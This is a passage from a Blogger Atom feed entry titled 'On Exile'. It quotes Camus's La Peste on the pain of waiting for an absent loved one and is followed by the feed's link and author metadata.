able to add to it everything they regretted not having done when they could have, with the man or woman they were waiting for, and likewise they mingled the image of the absent one into all the relatively happy circumstances of their lives as prisoners, unable to be satisfied with what they were actually living. Impatient with the present, enemies of the past and deprived of a future, we were like those whom human justice or hatred keeps behind bars. In the end, the only way to escape this unbearable wandering was to make the trains run in one's imagination and fill the hours with the ringing of a doorbell that nevertheless remained obstinately silent"&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: right;"&gt;- Albert Camus, La Peste&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-6382222411191458760?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6382222411191458760/comments/default' title='Post comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6382222411191458760' title='0 comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6382222411191458760'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6382222411191458760'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/11/sobre-el-exilio.html' title='On Exile'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry></feed>
